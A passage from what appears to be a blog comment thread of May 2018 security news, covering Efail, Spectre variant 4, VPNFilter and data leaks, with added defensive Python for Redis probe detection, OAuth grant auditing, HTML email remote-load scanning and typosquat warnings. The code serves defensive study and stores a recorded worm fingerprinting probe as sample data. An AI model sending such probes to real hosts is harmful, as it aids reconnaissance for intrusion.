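        length = int(data[pos + 1:end])
        start = end + 2
        args.append(data[start:start + length].decode())
        if data[start + length:start + length + 2] != b"\r\n":
            raise ValueError("bulk string not terminated")
        pos = start + length + 2
    return args, data[pos:]


def classify_session(stream):
    """Walk a captured client->server byte stream, list the commands it carries
    and say whether INFO arrived without any AUTH (an unauthenticated probe)."""
    cmds = []
    rest = stream
    while rest:
        args, rest = decode_resp_array(rest)
        cmds.append(args)
    authed = any(c and c[0].upper() == "AUTH" for c in cmds)
    probed = any(c and c[0].upper() == "INFO" for c in cmds)
    return {"commands": cmds, "unauthenticated_info": probed and not authed}


# From the diary: the exact bytes the worm sends to fingerprint a host.
WORM_PROBE = b"*1\r\n$4\r\nINFO\r\n"

# Constructed: a legitimate client that authenticates before asking for INFO.
LEGIT_SESSION = encode_command("AUTH", "s3cret-placeholder") + encode_command("INFO")


if __name__ == "__main__":
    print(classify_session(WORM_PROBE))
    print(classify_session(LEGIT_SESSION))
```

A Redis instance that is not reachable from the Internet and requires a password (or is bound only to localhost) never sees the probe succeed; the classifier is useful on a honeypot or a span port to measure how often such probes arrive.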
Tomi Engdahl says:
Was the Efail disclosure horribly screwed up?
https://blog.cryptographyengineering.com/2018/05/17/was-the-efail-disclosure-horribly-screwed-up/
On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction.
By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker-controlled server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.
The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world.
Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients.
How Efail was disclosed to the PGP community
Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us.
Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding.
All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.
There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal.
A unified timeline of Efail PGP disclosure events
http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html
Tomi Engdahl says:
Insecure Claymore Miner Management API Exploited in the Wild
https://isc.sans.edu/forums/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/
We have seen a notable increase in scans for port 3333/tcp in the wild. Port 3333 is used by a variety of crypto coin miners and mining pools.
Tomi Engdahl says:
200 Million Sets of Japanese PII Emerge on Underground Forums
https://www.securityweek.com/200-million-sets-japanese-pii-emerge-underground-forums
A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.
Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.
The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.
Tomi Engdahl says:
Misconfigured CalAmp Server Enabled Vehicle Takeover
https://www.securityweek.com/misconfigured-calamp-server-enabled-vehicle-takeover
A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.
The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.
The researchers discovered that the application uses an SSL connection and uses SSL pinning to prevent tampering.
Tomi Engdahl says:
DHS Publishes New Cybersecurity Strategy
https://www.securityweek.com/dhs-publishes-new-cybersecurity-strategy
The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.
The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide “the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient.”
https://www.dhs.gov/sites/default/files/publications/DHS-Cybersecurity-Strategy_1.pdf
Tomi Engdahl says:
Tara Francis Chan / Business Insider:
Chinese state-run media says the country’s social credit system has blocked people from taking over 11M flights and 4M train trips; full rollout coming by 2020
http://www.businessinsider.com/china-social-credit-system-blocked-people-taking-flights-train-trips-2018-5?op=1
Tomi Engdahl says:
Zack Whittaker / ZDNet:
TeenSafe, an app for parents to monitor kids’ phone use, stored some app login passwords and kids’ Apple ID credentials in plaintext on an unsecured AWS server
Teen phone monitoring app leaked thousands of user passwords
https://www.zdnet.com/article/teen-phone-monitoring-app-leaks-thousands-of-users-data/
Exclusive: A server stored teenagers’ Apple ID email addresses and plaintext passwords.
At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.
The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.
Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.
Robert Wiggins, a UK-based security researcher who searches for public and exposed data, found two leaky servers.
Both of the servers were pulled offline after ZDNet alerted the company.
“We have taken action to close one of our servers to the public and begun alerting customers that could potentially be impacted,” a TeenSafe spokesperson told ZDNet on Sunday.
The database stores the parent’s email address associated with TeenSafe, as well as their corresponding child’s Apple ID email address. It also includes the child’s device name — which is often just their name — and their device’s unique identifier.
there were at least 10,200 records from the past three months containing customers’ data
TeenSafe claims to have over a million parents using the service.
We contacted a dozen people over iMessage, one by one, to confirm their passwords
It’s not clear why the data, let alone passwords for teens’ Apple IDs, was stored in plaintext.
The company claims on its website that it’s “secure” and uses encryption
How not to verify a data breach (and why some really want you to get ‘pwned’)
Whatever you do, don’t break the law…
https://www.zdnet.com/article/how-not-to-verify-a-data-breach/
Just as hackers want verification for credibility or acclaim, some breach sites want news coverage to sell something. The hacked companies want to know so they can disaster-manage (companies get hacked because their security is bad, not because the hackers are always that good), and news outlets want the exclusive.
But also — verification is important for the victims. The sooner victims know about data breaches, the sooner they can protect themselves.
Make no mistake, verifying data isn’t an easy process. It’s time consuming, laborious, and not always fruitful.
Logging into someone else’s account without permission is illegal in the US.
Besides, that still wouldn’t be enough to verify a breach
When reporters verify breaches, they walk a line to ensure they’re not intrusive or inconveniencing people. One of the easiest ways to begin verifying a breach is by enumerating disposable Mailinator email accounts through a website’s password reset field. Reporters also have to examine the data
This boom in hack reporting has in part led to a cycle of more awareness and coverage, which has led to more data breach monitoring and notification sites popping up
Tomi Engdahl says:
Microsoft, Google: We’ve found a fourth data-leaking Meltdown-Spectre CPU hole
Design blunder exists in Intel, AMD, Arm, Power processors
https://www.theregister.co.uk/2018/05/21/spectre_meltdown_v4_microsoft_google/
A fourth variant of the data-leaking Meltdown-Spectre security flaws in modern processors has been found by Microsoft and Google researchers.
These speculative-execution design blunders can be potentially exploited by malicious software running on a vulnerable device or computer
Variants 1 and 2 are known as Spectre (CVE-2017-5753, CVE-2017-5715), and variant 3 is Meltdown (CVE-2017-5754). Today, variant 4 (CVE-2018-3639) was disclosed by Microsoft and Google researchers.
It affects modern out-of-order execution processor cores from Intel, AMD, and Arm, as well as IBM’s Power 8, Power 9, and System z CPUs. Bear in mind, Arm cores are used the world over in smartphones, tablets, and embedded electronics.
The fourth variant can be potentially exploited by script files running within a program – such as JavaScript on a webpage in a browser tab
According to Intel, mitigations already released to the public for variant 1, which is the hardest vulnerability to tackle, should make attacks leveraging variant 4 much more difficult.
So far, no known exploit code is circulating in the wild targeting the fourth variant.
Another bug, CVE-2018-3640, was also disclosed: this is a rogue system register read, allowing normal programs to peek at hardware status flags and the like in registers that should only really be accessible by the operating system kernel, drivers, and hypervisors.
Variant 4 is referred to as a speculative store bypass. It is yet another “wait, why didn’t I think of that?” design oversight in modern out-of-order-execution engineering.
The name Spectre was chosen deliberately: it is like observing a ghost in the machine. Private data can be discerned by watching the cache being updated by the processor’s speculative execution engine. This speculation is crucial to running chips as fast as possible
Intel, Arm, et al response
“Variant 4 uses speculative execution, a feature common to most modern processor architectures, to potentially expose certain kinds of data through a side channel,” said Leslie Culbertson, Intel’s executive veep of product security.
“Starting in January, most leading browser providers deployed mitigations for Variant 1 in their managed runtimes – mitigations that substantially increase the difficulty of exploiting side channels in a web browser. These mitigations are also applicable to Variant 4 and available for consumers to use today.”
According to Culbertson, Intel and others will issue new microcode and software tweaks to more fully counter malware exploiting the fourth variant.
“We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.
“This mitigation will be set to off-by-default, providing customers the choice of whether to enable it or not. We expect most industry software partners will likewise use the default-off option.
If enabled, we’ve observed a performance impact of approximately 2-8 per cent
Arm will make available to system-on-chip designers updated blueprints for Cortex-A72, Cortex-A73, and Cortex-A75 cores that are resistant to Spectre variant 2, and the Cortex-A75 will be updated to resist Meltdown, aka variant 3.
Red Hat today published a substantial guide to the fourth variant, its impact, and how it works. VMware also has an advisory and updates, here,
We note that, so far, no malware has been seen attacking any of the Spectre and Meltdown holes in today’s chips, let alone this latest variant
Speculative Store Buffer Bypass in 3 minutes
https://www.youtube.com/watch?v=Uv6lDgcUAC0
Speculative Store Buffer Bypass is a security vulnerability that allows unauthorized users to steal sensitive information through websites. Similar to the Spectre and Meltdown threats in early 2018, it exploits speculative execution–a process most computers use to speed up routine tasks
Tomi Engdahl says:
FireEye Launches OAuth Attack Testing Platform
https://www.securityweek.com/fireeye-launches-oauth-attack-testing-platform
FireEye on Monday announced the availability of a platform to allow organizations and pentesters to check their ability to detect and respond to OAuth abuse attacks.
OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user’s data without the need for credentials.
“In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.
In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).
An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.
Shining a Light on OAuth Abuse with PwnAuth
https://www.fireeye.com/blog/threat-research/2018/05/shining-a-light-on-oauth-abuse-with-pwnauth.html
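Because the access token, not a password, is what the attacker ends up holding, the defensive question is which third-party apps have been granted broad, long-lived access and by whom. As an added example (not FireEye's tool or code, and not tied to any particular identity provider), the Python below audits a constructed export of consent grants and parses an authorization-endpoint URL into the fields a reviewer looks at. The client ids, the allowlist and the scope names are constructed placeholders; real providers use their own scope strings.

```python
"""Added example (not from the FireEye post): audit OAuth consent grants for the
abuse pattern described above, a third-party app granted broad access by a
tricked user. All identifiers, scopes and grants below are constructed."""
from urllib.parse import urlparse, parse_qs

# Constructed: apps the organisation has reviewed and approved.
APPROVED_CLIENT_IDS = {"client-approved-0001"}

# Constructed: scopes that read user data or keep access alive via refresh tokens.
HIGH_RISK_SCOPES = {"mail.read", "files.read.all", "contacts.read", "offline_access"}

# Constructed consent-grant export: who consented to which app, with which scopes.
GRANTS = [
    {"user": "alice@example.test", "client_id": "client-approved-0001",
     "scopes": ["openid", "profile", "offline_access"], "granted": "2018-05-10T09:12:00"},
    {"user": "bob@example.test", "client_id": "client-unknown-77a2",
     "scopes": ["openid", "mail.read", "offline_access"], "granted": "2018-05-20T15:41:00"},
    {"user": "carol@example.test", "client_id": "client-unknown-77a2",
     "scopes": ["openid", "profile"], "granted": "2018-05-21T08:03:00"},
]


def risky_grants(grants, approved=APPROVED_CLIENT_IDS, high_risk=HIGH_RISK_SCOPES):
    """Return grants to unapproved apps that carry at least one high-risk scope.
    These are the grants that need to be explicitly revoked, since rotating the
    user's password or enforcing 2FA does not invalidate an issued token."""
    out = []
    for g in grants:
        risky = sorted(s for s in g["scopes"] if s.lower() in high_risk)
        if g["client_id"] not in approved and risky:
            out.append((g["user"], g["client_id"], risky))
    return out


def parse_authorization_request(url):
    """Break an authorization-endpoint URL into the fields a reviewer looks at:
    who is asking (client_id), for what (scope), and where the code goes."""
    q = parse_qs(urlparse(url).query)
    return {
        "client_id": q.get("client_id", [""])[0],
        "scopes": q.get("scope", [""])[0].split(),
        "redirect_uri": q.get("redirect_uri", [""])[0],
        "response_type": q.get("response_type", [""])[0],
    }


def request_needs_review(url, approved=APPROVED_CLIENT_IDS, high_risk=HIGH_RISK_SCOPES):
    """True when an unapproved app asks for a high-risk scope (e.g. from a proxy log)."""
    req = parse_authorization_request(url)
    risky = [s for s in req["scopes"] if s.lower() in high_risk]
    return req["client_id"] not in approved and bool(risky)


if __name__ == "__main__":
    for user, client, scopes in risky_grants(GRANTS):
        print(f"revoke: {user} -> {client} {scopes}")
```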
Tomi Engdahl says:
Germany calls on chip and hardware makers to tackle processor flaws
https://www.reuters.com/article/us-cyber-germany/germany-calls-on-chip-and-hardware-makers-to-tackle-processor-flaws-idUSKCN1IJ2H3
Germany’s federal cyber agency called on chip and hardware-makers to address new vulnerabilities discovered in computer central processing units, but said no complete fix was possible at the moment.
The BSI agency said its analysis showed the new flaws, dubbed Spectre-Next Generation, resembled the Meltdown and Spectre bugs discovered in January and could allow attackers to access personal data such as passwords and encryption keys.
While no new attacks were known outside laboratories, there was a risk that attackers could develop new methods based on detailed information that had been disclosed, it added.
Tomi Engdahl says:
Explaining Efail and Why It Isn’t the End of Email Privacy
https://hackaday.com/2018/05/21/explaining-efail-and-why-it-isnt-the-end-of-email-privacy/
Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.
A team of researchers published a paper(PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.
But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients, but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption altogether just makes no sense.
Aside from the massive false alarm, Efail is a very interesting exploi
Efail Does Not Directly Exploit PGP
In a nutshell, if an attacker is able to get access to a user’s encrypted email, they can modify the message in a specific way and send it back to the user. The user’s email client will then decrypt the message and (if the email client is rendering HTML tags) automatically send the decrypted message back to the attacker.
The encryption itself is not broken in any way. It’s how the messages are processed by the user’s email client that introduces the vulnerability. Saying PGP is broken is just plain wrong
Efail Builds On the Concepts of Tracking Pixels
Efail uses this kind of remote loading of images as the backchannel to exfiltrate the decrypted email. Other methods should also be possible. Efail takes advantage of the fact that the email client first has to decrypt an encrypted message in order to show it and then renders the HTML code in the message.
Malleability Gadgets
We’ve seen how simple it is to implement a direct exfiltration channel in order to decrypt email. In some email clients, that technique does not work, so the Efail paper describes a more generic way to introduce the exfiltration channel inside the actually encrypted data itself.
Conclusion
My hope is that the reader realizes two things: that the encryption of emails is still generically safe and that rendering HTML in emails is still not a good idea.
To protect yourself against this vulnerability, and a lot of others, disable HTML rendering in your email client. Many email clients allow for this and/or have settings to disable the loading of remote content.
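The advice above, disable HTML rendering or at least remote content loading, can be checked mechanically. As an added example (not from the Hackaday article), the Python below scans a decrypted HTML body for every element that would trigger a network fetch when rendered (images, stylesheets, scripts, CSS url() references and so on), which is exactly the backchannel described in the article; a client, gateway or plugin can refuse to render the part, or show it as text, if the list is non-empty. The sample message is constructed; inline "cid:" references to attached parts are treated as safe because they never leave the client.

```python
"""Added example (not from the Hackaday article): find elements in an HTML email
body that would cause a remote fetch when rendered. Sample HTML is constructed."""
from html.parser import HTMLParser
import re

# Attributes that make a client fetch a URL as soon as the part is rendered.
LOADING_ATTRS = {
    "img": ("src", "srcset"), "link": ("href",), "script": ("src",),
    "iframe": ("src",), "video": ("src", "poster"), "audio": ("src",),
    "source": ("src", "srcset"), "object": ("data",), "embed": ("src",),
    "input": ("src",), "body": ("background",), "table": ("background",),
    "td": ("background",),
}
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)
REMOTE_SCHEME = re.compile(r"^\s*(https?:|//)", re.IGNORECASE)   # cid:/data: are local


def _first_url(value):
    """For srcset-style lists take the first URL; plain attributes pass through."""
    head = value.split(",")[0].strip()
    return head.split()[0] if head else ""


class RemoteLoadScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # (tag, attribute, url)
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in LOADING_ATTRS.get(tag, ()):
            value = attrs.get(name)
            if value and REMOTE_SCHEME.match(_first_url(value)):
                self.findings.append((tag, name, value))
        style = attrs.get("style")
        if style:   # inline CSS such as background:url(...)
            for url in CSS_URL.findall(style):
                if REMOTE_SCHEME.match(url):
                    self.findings.append((tag, "style", url))
        if tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:   # <style> blocks arrive as raw data
            for url in CSS_URL.findall(data):
                if REMOTE_SCHEME.match(url):
                    self.findings.append(("style", "css", url))


def find_remote_loads(html):
    scanner = RemoteLoadScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def safe_to_render(html):
    """Policy a client could apply: render HTML only if nothing would be fetched."""
    return not find_remote_loads(html)


# Constructed message: one inline image (safe), one tracking pixel, one CSS
# background and one stylesheet reference, all pointing at constructed hosts.
SAMPLE_EMAIL_HTML = """<html><body>
<p>Quarterly numbers attached.</p>
<img src="cid:logo@example.test" alt="inline logo">
<img src="https://tracker.example.net/pixel.gif?id=constructed" width="1" height="1">
<div style="background:url(https://cdn.example.net/bg.png)">hi</div>
<style>.x{background-image:url('//static.example.net/a.png')}</style>
</body></html>"""


if __name__ == "__main__":
    for finding in find_remote_loads(SAMPLE_EMAIL_HTML):
        print(finding)
    print("safe to render:", safe_to_render(SAMPLE_EMAIL_HTML))
```

Note that this only covers the direct-exfiltration channel via HTML; the malleability-gadget variant the article mentions still needs the same remote fetch to leak anything, so blocking remote loads addresses both, but a client that verifies MDC/integrity of the decrypted data closes the second one at the crypto layer as well.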
Tomi Engdahl says:
Comcast is (update: was) leaking the names and passwords of customers’ wireless routers
https://techcrunch.com/2018/05/21/comcast-is-leaking-the-names-and-passwords-of-customers-wireless-routers/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook
Comcast has just been caught in a major security snafu: revealing the passwords of its customers’ Xfinity-provided wireless routers in plaintext on the web. Anyone with a subscriber’s account number and street address number will be served up the Wi-Fi name and password via the company’s Xfinity internet activation service.
Update: Comcast has taken down the service in question. “There’s nothing more important than our customers’ security,” a Comcast representative said in a statement.
Tomi Engdahl says:
How to prevent a typo from making you an identity theft victim
https://www.washingtonpost.com/news/get-there/wp/2018/05/03/how-to-prevent-a-typo-from-making-you-an-identity-theft-victim/?noredirect=on&utm_term=.276621c04784
I’ve typed in an Internet address and with the slip of a finger ended up on some funky website. One typo.
Scammers love typos. And to capitalize on them, they hijack popular web addresses and cybersquat on URLs that are a typo away from legitimate websites. It’s a scheme called “typosquatting,” and it is intended to trick Internet users, according to Fraud.org, a project of the National Consumers League.
“If a user is unlucky enough to mistakenly type in the wrong address, they may be taken to a booby-trapped website filled with viruses and malware, or to a website that looks just like the legitimate website but is designed to gather their personal data for scammers,”
Close to 12 million online users visited potentially dangerous websites during the first quarter of this year
Krebs warned readers that “malicious websites ending in ‘.cm’ that mimic some of the world’s most popular Internet destinations
Here are two of the tips.
— Double check what you’re typing.
— Bookmark websites you visit often
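As an added example (not from the Washington Post piece or Fraud.org), the "double check what you're typing" tip can be automated: warn when a typed host name is one edit or one transposition away from a site the user has bookmarked, which also catches the ".cm" for ".com" case the article quotes Krebs on. The bookmark list is constructed; the check is meant for a browser extension or a proxy allowlist, not as a way to generate look-alike domains.

```python
"""Added example (not from the article): warn when a typed host name is a
near-miss for a bookmarked site. The bookmark list below is constructed."""

BOOKMARKS = ["example.com", "mybank.example", "news.example.org"]   # constructed


def edit_distance(a, b):
    """Classic Levenshtein distance (insert, delete, substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,           # delete ca
                           cur[j - 1] + 1,        # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def transposed(a, b):
    """True if a and b differ only by swapping two adjacent characters
    (Levenshtein counts that as 2, so it is checked separately)."""
    if len(a) != len(b):
        return False
    diffs = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
    return (len(diffs) == 2 and diffs[1] == diffs[0] + 1
            and a[diffs[0]] == b[diffs[1]] and a[diffs[1]] == b[diffs[0]])


def typo_candidates(typed, bookmarks=BOOKMARKS, max_distance=1):
    """Return (bookmark, distance) pairs the typed name is suspiciously close to.
    An exact match returns an empty list: nothing to warn about."""
    typed = typed.lower().strip().rstrip(".")
    hits = []
    for site in bookmarks:
        if typed == site:
            return []
        d = edit_distance(typed, site)
        if d <= max_distance or transposed(typed, site):
            hits.append((site, d))
    return hits


if __name__ == "__main__":
    for name in ("example.cm", "exmaple.com", "example.com"):
        print(name, "->", typo_candidates(name))
```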
Tomi Engdahl says:
Amazon facial recognition software raises privacy concerns with the ACLU
https://techcrunch.com/2018/05/22/amazon-facial-recognition-software-raises-privacy-concerns-with-the-aclu/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook
Amazon hasn’t exactly kept Rekognition under wraps. In late 2016, the software giant talked up its facial detection software in a relatively benign AWS post announcing that the tech was already being implemented by The Washington County Sheriff’s Office in Oregon for suspect identification.
The ACLU of Northern California is shining more light on the tech this week
“raises profound civil liberties and civil rights concerns.”
Tomi Engdahl says:
Teen monitoring app TeenSafe exposes thousands of passwords
https://techcrunch.com/2018/05/21/teen-monitoring-app-teensafe-exposes-thousands-of-passwords/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook
U.K.-based security researcher Robert Wiggins has found two exposed TeenSafe servers, leaking the passwords and information of some users of the monitoring service.
TeenSafe is meant to protect teenagers by letting their parents monitor their texts, phone calls, web history, location and app downloads. The breach was first reported by ZDNet.
According to the report, TeenSafe left two of their servers, which were hosted on AWS, exposed and viewable by anyone.
Tomi Engdahl says:
FBI’s flawed phone tally blamed on programming error. 7,800 unbreakable mobes? Er, um…
We meant 1,000. Maybe 2,000
https://www.theregister.co.uk/2018/05/23/feds_flawed_phone_tally_blamed_on_programming_error/
The FBI apparently gilded the lily in its long campaign against consumer cryptography, telling the world it held more locked phones than it did.
At issue is the Feds’ claim that it’s seized 7,000 phones it can’t crack because they’re encrypted.
He upped the ante in December 2017, telling a Congressional budget hearing the FBI couldn’t access the content of “approximately 7,800 mobile devices” in spite of having the legal authority to.
However, the Washington Post is now reporting that number was “inflated”, and instead, the FBI only has between 1,000 and 2,000 phones.
The WashPo said the error was discovered about a month ago, and since then the FBI has been trying to get a more accurate count, and an audit could take weeks.
The agency gave the newspaper a statement blaming the error on “programming errors” that delivered “significant over-counting of the devices reported”.
Tomi Engdahl says:
Jim Finkle / Reuters:
Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …
Cyber researchers, Ukraine warn of possible Russian attack
https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9
Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.
The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.
Cisco, which uncovered the campaign several months ago, alerted authorities in Ukraine and the United States before going public with its findings about the malware it dubbed VPNFilter.
Cisco described the mechanisms that the malware uses to hide communications with hackers and a module that targets industrial networks like ones that operate electric grids, said Michael Daniel, chief executive officer of Cyber Threat Alliance, a nonprofit group.
VPNFilter has infected devices in at least 54 countries, but by far the largest number is in Ukraine
Tomi Engdahl says:
Yubico and LastPass bring NFC-based two-factor authentication to the iPhone
https://www.zdnet.com/article/yubico-and-lastpass-bring-nfc-based-two-factor-authentication-to-the-iphone/
Popular password manager LastPass delivers the first iOS app with support for the YubiKey NEO hardware-based authentication key with NFC support.
Tomi Engdahl says:
Exclusive: FBI Seizes Control of Russian Botnet
https://amp.thedailybeast.com/exclusive-fbi-seizes-control-of-russian-botnet
FBI agents armed with a court order have seized control of a key server in the Kremlin’s global botnet of 500,000 hacked routers, The Daily Beast has learned. The move positions the bureau to build a comprehensive list of victims of the attack, and short-circuits Moscow’s ability to reinfect its targets.
The FBI counter-operation goes after “VPN Filter,” a piece of sophisticated malware linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.
New VPNFilter malware targets at least 500K networking devices worldwide
https://blog.talosintelligence.com/2018/05/VPNFilter.html
Tomi Engdahl says:
VPNFilter: New Router Malware with Destructive Capabilities
Unlike most other IoT threats, malware can survive reboot.
https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware
A new threat which targets a range of routers and NAS devices is capable of knocking out infected devices by rendering them unusable. The malware, known as VPNFilter, is unlike most other IoT threats because it is capable of maintaining a persistent presence on an infected device, even after a reboot. VPNFilter has a range of capabilities including spying on traffic being routed through the device. Its creators appear to have a particular interest in SCADA industrial control systems, creating a module which specifically intercepts Modbus SCADA communications.
According to new research from Cisco Talos, activity surrounding the malware has stepped up in recent weeks and the attackers appear to be particularly interested in targets in Ukraine.
Q: What devices are known to be affected by VPNFilter?
A: To date, VPNFilter is known to be capable of infecting enterprise and small office/home office routers from Linksys, MikroTik, Netgear, and TP-Link, as well as QNAP network-attached storage (NAS) devices. These include:
Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS251
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN
Q: How does VPNFilter infect affected devices?
A: Most of the devices targeted are known to use default credentials and/or have known exploits, particularly for older versions. There is no indication at present that the exploit of zero-day vulnerabilities is involved in spreading the threat.
Tomi Engdahl says:
Troy Hunt and Have i Been Pwned
http://www.bosslevelpodcast.com/troy-hunt-and-have-i-been-pwned/
My guest for this episode is Troy Hunt, well known security expert and creator of haveibeenpwned.com. It’s a service which allows you to check whether your email has been leaked as a part of a data breach.
We talk about online security, including securing your accounts and using a password manager.